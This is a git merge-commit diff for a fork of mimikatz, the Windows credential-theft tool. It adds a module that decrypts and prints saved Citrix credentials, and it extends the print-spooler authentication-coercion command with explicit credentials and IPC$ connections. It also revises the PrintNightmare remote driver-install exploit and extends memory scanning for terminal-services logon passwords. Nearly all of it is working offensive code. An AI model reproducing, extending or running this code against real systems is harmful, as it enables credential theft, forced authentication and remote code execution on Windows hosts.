Merge branch 'gentilkiwi:master' into master

2025-03-18 08:31:40 +00:00 · 2022-07-21 12:30:19 +10:00 · 2022-07-21 12:30:19 +10:00 · a952a601b5
commit a952a601b5
parent aeda2f7f11 b401761f30
35 changed files with 1071 additions and 271 deletions
--- a/inc/globals.h
+++ b/inc/globals.h
@ -118,7 +118,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_BUILD_10_1909	18363
 #define KULL_M_WIN_BUILD_10_2004	19041
 #define KULL_M_WIN_BUILD_10_20H2	19042
-
+#define KULL_M_WIN_BUILD_2022		20348

 #define KULL_M_WIN_MIN_BUILD_XP		2500
 #define KULL_M_WIN_MIN_BUILD_2K3	3000
@ -126,4 +126,5 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_MIN_BUILD_7		7000
 #define KULL_M_WIN_MIN_BUILD_8		8000
 #define KULL_M_WIN_MIN_BUILD_BLUE	9400
-#define KULL_M_WIN_MIN_BUILD_10		9800
+#define KULL_M_WIN_MIN_BUILD_10		9800
+#define KULL_M_WIN_MIN_BUILD_11		22000
--- a/mimikatz/mimikatz.vcxproj
+++ b/mimikatz/mimikatz.vcxproj
@ -173,6 +173,7 @@
    <ClCompile Include="modules\dpapi\kuhl_m_dpapi.c" />
    <ClCompile Include="modules\dpapi\kuhl_m_dpapi_oe.c" />
    <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.c" />
+    <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.c" />
    <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_cloudap.c" />
    <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_creds.c" />
    <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_keys.c" />
@ -289,6 +290,7 @@
    <ClInclude Include="modules\dpapi\kuhl_m_dpapi.h" />
    <ClInclude Include="modules\dpapi\kuhl_m_dpapi_oe.h" />
    <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.h" />
+    <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.h" />
    <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_cloudap.h" />
    <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_creds.h" />
    <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_keys.h" />
--- a/mimikatz/mimikatz.vcxproj.filters
+++ b/mimikatz/mimikatz.vcxproj.filters
@ -329,6 +329,9 @@
    <ClCompile Include="..\modules\rpc\kull_m_rpc_ms-efsr_c.c">
      <Filter>common modules\rpc</Filter>
    </ClCompile>
+    <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.c">
+      <Filter>local modules\dpapi\packages</Filter>
+    </ClCompile>
  </ItemGroup>
  <ItemGroup>
    <ClInclude Include="mimikatz.h" />
@ -677,6 +680,9 @@
    <ClInclude Include="..\modules\rpc\kull_m_rpc_ms-efsr.h">
      <Filter>common modules\rpc</Filter>
    </ClInclude>
+    <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.h">
+      <Filter>local modules\dpapi\packages</Filter>
+    </ClInclude>
  </ItemGroup>
  <ItemGroup>
    <Filter Include="local modules">
--- a/mimikatz/modules/dpapi/kuhl_m_dpapi.c
+++ b/mimikatz/modules/dpapi/kuhl_m_dpapi.c
@ -27,6 +27,7 @@ const KUHL_M_C kuhl_m_c_dpapi[] = {
 	{kuhl_m_dpapi_cloudap_keyvalue_derived,	L"cloudapkd",	L""},
 	{kuhl_m_dpapi_cloudap_fromreg, L"cloudapreg",	L""},
 	{kuhl_m_dpapi_sccm_networkaccessaccount, L"sccm",	L""},
+	{kuhl_m_dpapi_citrix,		L"citrix",	L""},
 	{kuhl_m_dpapi_oe_cache,		L"cache", NULL},
 };
 const KUHL_M kuhl_m_dpapi = {
--- a/mimikatz/modules/dpapi/kuhl_m_dpapi.h
+++ b/mimikatz/modules/dpapi/kuhl_m_dpapi.h
@ -20,6 +20,7 @@
 #include "packages/kuhl_m_dpapi_lunahsm.h"
 #include "packages/kuhl_m_dpapi_cloudap.h"
 #include "packages/kuhl_m_dpapi_sccm.h"
+#include "packages/kuhl_m_dpapi_citrix.h"

 const KUHL_M kuhl_m_dpapi;

--- a/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c
+++ b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c
@ -0,0 +1,89 @@
+/*	Benjamin DELPY `gentilkiwi`
+	https://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kuhl_m_dpapi_citrix.h"
+
+const char CITRIX_SAVED_CREDENTIALS_GUID[] = "{921BB3E1-15EE-4bbe-83D4-C4CE176A481B}";
+NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[])
+{
+	PKULL_M_REGISTRY_HANDLE hRegistry;
+	PBYTE pbData;
+	DWORD cbData;
+	LPCWSTR szData;
+	LPWSTR szGuid = NULL, szUrl, szBase64, szSavedCreds;
+	LPSTR sEntropy;
+	IXMLDOMDocument *pXMLDom;
+	IXMLDOMNode *pNode;
+	LPVOID pDataOut;
+	DWORD dwDataOutLen;
+
+	if(kull_m_string_args_byName(argc, argv, L"guid", &szData, NULL))
+	{
+		kull_m_string_copy(&szGuid, szData);
+	}
+	else if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_OWN, NULL, FALSE, &hRegistry)) // todo: offline
+	{
+		//For v3, KEY_WOW64_32KEY
+		kull_m_registry_OpenAndQueryWithAlloc(hRegistry, HKEY_LOCAL_MACHINE, L"SOFTWARE\\"
+		#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64			
+			L"WOW6432Node\\"
+		#endif
+			L"Citrix\\AuthManager", L"Guid", NULL, (LPVOID *) &szGuid, NULL);
+		kull_m_registry_close(hRegistry);
+	}
+
+	if(szGuid)
+	{
+		kprintf(L"Citrix instance GUID : %s\n", szGuid);
+
+		if(kull_m_string_args_byName(argc, argv, L"in", &szData, NULL))
+		{
+			kprintf(L"Using saved data from: %s\n", szData);
+			if(pXMLDom = kull_m_xml_CreateAndInitDOM())
+			{
+				if(kull_m_xml_LoadXMLFile(pXMLDom, szData))
+				{
+					if((IXMLDOMDocument_selectSingleNode(pXMLDom, (BSTR) L"//Data/Item", &pNode) == S_OK) && pNode)
+					{
+						szUrl = kull_m_xml_getAttribute(pNode, L"url");
+						if(szUrl)
+						{
+							kprintf(L"URL: %s\n", szUrl);
+							kull_m_string_sprintfA(&sEntropy, "%S%s%S", szUrl, CITRIX_SAVED_CREDENTIALS_GUID, szGuid);
+							if(sEntropy)
+							{
+								if(IXMLDOMNode_get_text(pNode, &szBase64) == S_OK)
+								{
+									if(kull_m_string_quick_base64_to_Binary(szBase64, &pbData, &cbData))
+									{
+										if(kuhl_m_dpapi_unprotect_raw_or_blob(pbData, cbData, NULL, argc, argv, sEntropy, lstrlenA(sEntropy), &pDataOut, &dwDataOutLen, NULL))
+										{
+											if(kull_m_string_copy_len(&szSavedCreds, (LPCWSTR) pDataOut, dwDataOutLen / sizeof(wchar_t)))
+											{
+												UrlUnescapeInPlace(szSavedCreds, 0);
+												kprintf(L" > Saved data: %s\n", szSavedCreds);
+												LocalFree(szSavedCreds);
+											}
+											LocalFree(pDataOut);
+										}
+									}
+									SysFreeString(szBase64);
+								}
+								LocalFree(sEntropy);
+							}
+							LocalFree(szUrl);
+						}
+					}
+				}
+				kull_m_xml_ReleaseDom(pXMLDom);
+			}
+		}
+		else PRINT_ERROR(L"Input Citrix saved data needed (/in:%%localappdata%%\\Citrix\\AuthManager\\Data\\<file.dat>)\n");
+		LocalFree(szGuid);
+	}
+	else PRINT_ERROR(L"No instance GUID ? (use /guid:xxx (without {} to specify\n");
+
+	return STATUS_SUCCESS;
+}
--- a/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h
+++ b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h
@ -0,0 +1,9 @@
+/*	Benjamin DELPY `gentilkiwi`
+	https://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#pragma once
+#include "../kuhl_m_dpapi.h"
+
+NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[]);
--- a/mimikatz/modules/kuhl_m_misc.c
+++ b/mimikatz/modules/kuhl_m_misc.c
@ -1342,58 +1342,127 @@ handle_t __RPC_USER STRING_HANDLE_bind(IN STRING_HANDLE Name) {return hSpoolHand
 void __RPC_USER STRING_HANDLE_unbind(IN STRING_HANDLE Name, handle_t hSpool) {}
 NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[])
 {
-	LPCWSTR szRemote, szCallbackTo;
-	LPWSTR szPathToCallback = NULL;
+	NTSTATUS status;
 	PRINTER_HANDLE hPrinter;
 	DEVMODE_CONTAINER Container = {0, NULL};
-	DWORD ret;
+	DWORD dwRet, AuthnSvc;
+	long ret = 0;
+	NETRESOURCE nr = {0, RESOURCETYPE_DISK,	0, 0, NULL, NULL, NULL, NULL};
+	LPCWSTR szUser, szPassword, szRemote = NULL, szEndpoint, szCallbackTo;
+	PWSTR szPathToCallback;
+
+	SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
+
+	if(kull_m_string_args_byName(argc, argv, L"authuser", &szUser, NULL))
+	{
+		AuthnSvc = RPC_C_AUTHN_GSS_NEGOTIATE;
+		kprintf(L"[auth ] Explicit authentication\n");
+		kprintf(L"[auth ] Username: %s\n", szUser);
+		secIdentity.User = (USHORT *) szUser;
+		secIdentity.UserLength = lstrlen(szUser);
+
+		if(kull_m_string_args_byName(argc, argv, L"authpassword", &szPassword, NULL))
+		{
+			kprintf(L"[auth ] Password: %s\n", szPassword);
+			secIdentity.Password = (USHORT *) szPassword;
+			secIdentity.PasswordLength = lstrlen(szPassword);
+		}
+	}
+	else if(kull_m_string_args_byName(argc, argv, L"noauth", NULL, NULL))
+	{
+		AuthnSvc = RPC_C_AUTHN_NONE;
+		kprintf(L"[auth ] None\n");
+		szUser = szPassword = L"";
+	}
+	else
+	{
+		AuthnSvc = RPC_C_AUTHN_DEFAULT;
+		kprintf(L"[auth ] Default (current)\n");
+		szUser = szPassword = NULL;
+	}
+
+	kull_m_string_args_byName(argc, argv, L"endpoint", &szEndpoint, L"\\pipe\\spoolss");
+	kprintf(L"[ rpc ] Endpoint: %s\n", szEndpoint);

 	if(kull_m_string_args_byName(argc, argv, L"server", &szRemote, NULL) || kull_m_string_args_byName(argc, argv, L"target", &szRemote, NULL))
 	{
 		if(kull_m_string_args_byName(argc, argv, L"connect", &szCallbackTo, NULL) || kull_m_string_args_byName(argc, argv, L"callback", &szCallbackTo, NULL))
 		{
-			if(kull_m_string_sprintf(&szPathToCallback, L"\\\\%s", szCallbackTo))
+			if(kull_m_string_sprintf(&nr.lpRemoteName, L"\\\\%s\\IPC$", szRemote))
 			{
-				kprintf(L"[info] %s will try to connect to %s\\IPC$\n\n", szRemote, szPathToCallback);
-				if(kull_m_rpc_createBinding(NULL, L"ncacn_np", szRemote, L"\\pipe\\spoolss", L"spooler", TRUE, RPC_C_AUTHN_DEFAULT, NULL, RPC_C_IMP_LEVEL_DEFAULT, &hSpoolHandle, NULL))
+				if(kull_m_string_sprintf(&szPathToCallback, L"\\\\%s", szCallbackTo))
 				{
-					RpcTryExcept
+					kprintf(L"[trans] Disconnect eventual IPC: ");
+					dwRet = WNetCancelConnection2(nr.lpRemoteName, 0, TRUE);
+					if((dwRet == NO_ERROR) || (dwRet == ERROR_NOT_CONNECTED))
 					{
-						ret = RpcOpenPrinter(NULL, &hPrinter, NULL, &Container, GENERIC_READ);
-						if(ret == ERROR_SUCCESS)
+						kprintf(L"OK\n[trans] Connect to IPC: ");
+						dwRet = WNetAddConnection2(&nr, szPassword, szUser, CONNECT_TEMPORARY);
+						if(dwRet == NO_ERROR)
 						{
-							ret = RpcRemoteFindFirstPrinterChangeNotification(hPrinter, PRINTER_CHANGE_ALL, PRINTER_NOTIFY_CATEGORY_ALL, szPathToCallback, 42, 0, NULL);
-							if(ret == ERROR_SUCCESS)
+							kprintf(L"OK\n");
+							if(kull_m_rpc_createBinding(NULL, L"ncacn_np", szRemote, szEndpoint, L"spooler", TRUE, AuthnSvc, secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hSpoolHandle, NULL))
 							{
-								kprintf(L"Connected to the target, and notification is OK (?!)\n");
-								ret = RpcFindClosePrinterChangeNotification(hPrinter);
-								if(ret != ERROR_SUCCESS)
+								kprintf(L"[ rpc ] Resolve Endpoint: ");
+								status = RpcEpResolveBinding(hSpoolHandle, &winspool_v1_0_c_ifspec);
+								if(status == RPC_S_OK)
 								{
-									PRINT_ERROR(L"RpcFindClosePrinterChangeNotification: 0x%08x\n", ret);
+									kprintf(L"OK\n\n");
+									RpcTryExcept
+									{
+										ret = RpcOpenPrinter(NULL, &hPrinter, NULL, &Container, GENERIC_READ);
+										if(ret == ERROR_SUCCESS)
+										{
+											ret = RpcRemoteFindFirstPrinterChangeNotification(hPrinter, PRINTER_CHANGE_ALL, PRINTER_NOTIFY_CATEGORY_ALL, szPathToCallback, 42, 0, NULL);
+											if(ret == ERROR_SUCCESS)
+											{
+												kprintf(L"Connected to the target, and notification is OK (?!)\n");
+												ret = RpcFindClosePrinterChangeNotification(hPrinter);
+												if(ret != ERROR_SUCCESS)
+												{
+													PRINT_ERROR(L"RpcFindClosePrinterChangeNotification: 0x%08x\n", ret);
+												}
+											}
+											else if(ret == ERROR_ACCESS_DENIED)
+											{
+												kprintf(L"Access is denied (can be OK)\n");
+											}
+											else PRINT_ERROR(L"RpcRemoteFindFirstPrinterChangeNotification: 0x%08x\n", ret);
+
+											ret = RpcClosePrinter(&hPrinter);
+											if(ret != ERROR_SUCCESS)
+											{
+												PRINT_ERROR(L"RpcClosePrinter: 0x%08x\n", ret);
+											}
+										}
+										else PRINT_ERROR(L"RpcOpenPrinter: 0x%08x\n", ret);
+									}
+									RpcExcept(RPC_EXCEPTION)
+										PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
+									RpcEndExcept
+
+									kprintf(L"\n");
 								}
+								else PRINT_ERROR(L"RpcEpResolveBinding: 0x%08x\n", status);
+								
+								kull_m_rpc_deleteBinding(&hSpoolHandle);
 							}
-							else if(ret == ERROR_ACCESS_DENIED)
-							{
-								kprintf(L"Access is denied (can be OK)\n");
-							}
-							else PRINT_ERROR(L"RpcRemoteFindFirstPrinterChangeNotification: 0x%08x\n", ret);

-							ret = RpcClosePrinter(&hPrinter);
-							if(ret != ERROR_SUCCESS)
+							kprintf(L"[trans] Disconnect IPC: ");
+							dwRet = WNetCancelConnection2(nr.lpRemoteName, 0, TRUE);
+							if(dwRet == NO_ERROR)
 							{
-								PRINT_ERROR(L"RpcClosePrinter: 0x%08x\n", ret);
+								kprintf(L"OK\n");
 							}
+							else PRINT_ERROR(L"WNetCancelConnection2: 0x%08x\n");
 						}
-						else PRINT_ERROR(L"RpcOpenPrinter: 0x%08x\n", ret);
+						else PRINT_ERROR(L"WNetAddConnection2:%u\n", dwRet);
 					}
-					RpcExcept(RPC_EXCEPTION)
-						PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
-					RpcEndExcept
+					else PRINT_ERROR(L"WNetCancelConnection2: %u\n", dwRet);

-					kull_m_rpc_deleteBinding(&hSpoolHandle);
+					LocalFree(szPathToCallback);
 				}
-
-				LocalFree(szPathToCallback);
+				LocalFree(nr.lpRemoteName);
 			}
 		}
 		else PRINT_ERROR(L"missing /connect argument to specify notifications target");
@ -1482,11 +1551,11 @@ NTSTATUS kuhl_m_misc_efs(int argc, wchar_t * argv[])
 										else if(ret == 0)
 										{
 											PRINT_ERROR(L"EfsRpcOpenFileRaw is a success, really? (not normal)\n");
-											EfsRpcCloseRaw(&hEfsHandle);
+											EfsRpcCloseRaw(&hImportCtx);
 										}
 										else
 										{
-											PRINT_ERROR(L"EfsRpcOpenFileRaw: ", ret);
+											PRINT_ERROR(L"EfsRpcOpenFileRaw: %u\n", ret);
 										}
 									}
 									RpcExcept(RPC_EXCEPTION)
@ -1589,7 +1658,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
 			DriverInfo.pEnvironment = bIsX64 ? L"Windows x64" : L"Windows NT x86";
 			if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL))
 			{
-				if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pConfigFile, NULL))
+				if(kuhl_m_misc_printnightmare_normalize_library(bIsPar, szLibrary, &DriverInfo.pConfigFile, NULL))
 				{
 					szForce = kull_m_string_args_byName(argc, argv, L"useown", NULL, NULL) ? DriverInfo.pConfigFile : NULL;

@ -1600,7 +1669,13 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
 						{
 							if(kuhl_m_misc_printnightmare_FillStructure(&DriverInfo, bIsX64, !kull_m_string_args_byName(argc, argv, L"nodynamic", NULL, NULL), szForce, bIsPar, hSpoolHandle))
 							{
-								kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER);
+								if(kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER))
+								{
+									if(!bIsPar) // we can't remotely with normal user, use /clean with > rights
+									{
+										kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hSpoolHandle, DriverInfo.pEnvironment, DriverInfo.pName);
+									}
+								}
 								
 								LocalFree(DriverInfo.pDataFile);
 								LocalFree(DriverInfo.pDriverPath);
@ -1624,7 +1699,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
 	return STATUS_SUCCESS;
 }

-BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
+BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
 {
 	BOOL status = FALSE;
 	LPCWSTR szPtr;
@ -1641,7 +1716,14 @@ BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *psz
 	}
 	else
 	{
-		status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
+		if(!bIsPar)
+		{
+			status = kull_m_file_getAbsolutePathOf(szLibrary, pszNormalizedLibrary);
+		}
+		else
+		{
+			status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
+		}
 	}

 	if(status)
@ -1742,7 +1824,7 @@ BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64

 void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete)
 {
-	DWORD i, ret, cReturned = 0;
+	DWORD i, cReturned = 0;
 	_PDRIVER_INFO_2 pDriverInfo;
 	PWSTR pName, pConfig;

@ -1759,28 +1841,7 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
 				{
 					if(pName == wcsstr(pName, MIMIKATZ L"-"))
 					{
-						RpcTryExcept
-						{
-							if(bIsPar)
-							{
-								kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
-								ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
-							}
-							else
-							{
-								kprintf(L"> RpcDeletePrinterDriverEx: ");
-								ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
-							}
-
-							if (ret == ERROR_SUCCESS)
-							{
-								kprintf(L"OK!\n");
-							}
-							else PRINT_ERROR(L"%u\n", ret);
-						}
-						RpcExcept(RPC_EXCEPTION)
-							PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
-						RpcEndExcept
+						kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hRemoteBinding, szEnvironment, pName);
 					}
 				}
 			}
@ -1789,8 +1850,9 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
 	}
 }

-void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
+BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
 {
+	BOOL status = FALSE;
 	DWORD ret;
 	DRIVER_CONTAINER container_info;

@ -1813,6 +1875,7 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi

 		if (ret == ERROR_SUCCESS)
 		{
+			status = TRUE;
 			kprintf(L"OK!\n");
 		}
 		else PRINT_ERROR(L"%u\n", ret);
@ -1820,6 +1883,40 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
 	RpcExcept(RPC_EXCEPTION)
 		PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
 	RpcEndExcept
+
+	return status;
+}
+
+BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName)
+{
+	BOOL status = FALSE;
+	DWORD ret;
+
+	RpcTryExcept
+	{
+		if(bIsPar)
+		{
+			kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
+			ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, (wchar_t *) pName, DPD_DELETE_UNUSED_FILES, 0);
+		}
+		else
+		{
+			kprintf(L"> RpcDeletePrinterDriverEx: ");
+			ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, (wchar_t *)pName, DPD_DELETE_UNUSED_FILES, 0);
+		}
+
+		if (ret == ERROR_SUCCESS)
+		{
+			status = TRUE;
+			kprintf(L"OK!\n");
+		}
+		else PRINT_ERROR(L"%u\n", ret);
+	}
+	RpcExcept(RPC_EXCEPTION)
+		PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
+	RpcEndExcept
+
+	return status;
 }

 BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned)
--- a/mimikatz/modules/kuhl_m_misc.h
+++ b/mimikatz/modules/kuhl_m_misc.h
@ -51,10 +51,11 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]);

-BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
+BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
 BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding);
 void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete);
-void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
+BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
+BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName);
 BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned);

 BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
--- a/mimikatz/modules/kuhl_m_net.c
+++ b/mimikatz/modules/kuhl_m_net.c
@ -645,7 +645,7 @@ NTSTATUS kuhl_m_net_trust(int argc, wchar_t * argv[])
 	else PRINT_ERROR(L"DsEnumerateDomainTrusts: %u\n", ret);

 	kprintf(L"\n\nLDAP mode: ");
-	if(kull_m_ldap_getLdapAndRootDN(server, L"defaultNamingContext", &ld, &dn))
+	if(kull_m_ldap_getLdapAndRootDN(server, L"defaultNamingContext", &ld, &dn, NULL))
 	{
 		if(kull_m_string_sprintf(&sysDN, L"CN=System,%s", dn))
 		{
@ -761,7 +761,7 @@ L")";
 	BOOL isCheckDNS = kull_m_string_args_byName(argc, argv, L"dns", NULL, NULL);
 	kull_m_string_args_byName(argc, argv, L"server", &server, NULL);

-	if(kull_m_ldap_getLdapAndRootDN(server, NULL, &ld, &dn))
+	if(kull_m_ldap_getLdapAndRootDN(server, NULL, &ld, &dn, NULL))
 	{
 		dwRet = ldap_search_s(ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, &pMessage);
 		if(dwRet == LDAP_SUCCESS)
--- a/mimikatz/modules/kuhl_m_sid.c
+++ b/mimikatz/modules/kuhl_m_sid.c
@ -317,7 +317,7 @@ BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PCWCHAR
 	PWCHAR myAttrs[] = {L"name", L"sAMAccountName", L"objectSid", L"sIDHistory", L"objectGUID", NULL}, dn, filter;
 	if(filter = kuhl_m_sid_filterFromArgs(argc, argv))
 	{
-		if(kull_m_ldap_getLdapAndRootDN(system, NULL, ld, &dn))
+		if(kull_m_ldap_getLdapAndRootDN(system, NULL, ld, &dn, NULL))
 		{
 			*pMessage = NULL;
 			dwErr = ldap_search_s(*ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, pMessage);
--- a/mimikatz/modules/kuhl_m_ts.c
+++ b/mimikatz/modules/kuhl_m_ts.c
@ -204,12 +204,15 @@ NTSTATUS kuhl_m_ts_logonpasswords(int argc, wchar_t * argv[])
 const BYTE MyPattern[] = {0x00, 0x00, 0x00, 0x00, 0xbb, 0x47, /*0x0b, 0x00*/};
 const BYTE MyPattern2[] = {0x00, 0x00, 0x00, 0x00, 0xf3, 0x47, /*0x0b, 0x00*/};
 const BYTE MyPattern3[] = {0x00, 0x00, 0x00, 0x00, 0x3b, 0x01};
+const BYTE MyWebPattern[] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
 BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION pMemoryBasicInformation, PVOID pvArg)
 {
 	KULL_M_MEMORY_ADDRESS aLocalBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aProcess = {pMemoryBasicInformation->BaseAddress, (PKULL_M_MEMORY_HANDLE) pvArg};
-	PBYTE CurrentPtr, limite;
+	PBYTE CurrentPtr, limite, ref;
 	PWTS_KIWI pKiwiData;
-	BOOL decStatus = TRUE, bIsCandidate;
+	PWTS_WEB_KIWI pWebKiwiData;
+	BOOL decStatus, bIsCandidate;
+	DWORD dwOffset;

 	if((pMemoryBasicInformation->Type == MEM_PRIVATE) && (pMemoryBasicInformation->State != MEM_FREE) && (pMemoryBasicInformation->Protect == PAGE_READWRITE))
 	{
@ -218,7 +221,7 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
 		{
 			if(kull_m_memory_copy(&aLocalBuffer, &aProcess, pMemoryBasicInformation->RegionSize))
 			{
-				for(CurrentPtr = (PBYTE) aLocalBuffer.address, limite = (PBYTE) aLocalBuffer.address + pMemoryBasicInformation->RegionSize; CurrentPtr + sizeof(MyPattern) <= limite; CurrentPtr++)
+				for(CurrentPtr = (PBYTE) aLocalBuffer.address, limite = (PBYTE) aLocalBuffer.address + pMemoryBasicInformation->RegionSize; CurrentPtr + sizeof(MyWebPattern) <= limite; CurrentPtr += sizeof(PVOID))
 				{
 					pKiwiData = (PWTS_KIWI) CurrentPtr;

@ -232,31 +235,91 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
 					}
 					else bIsCandidate = FALSE;
 					
-					if(bIsCandidate && !pKiwiData->unk2)
+					if(bIsCandidate)
 					{
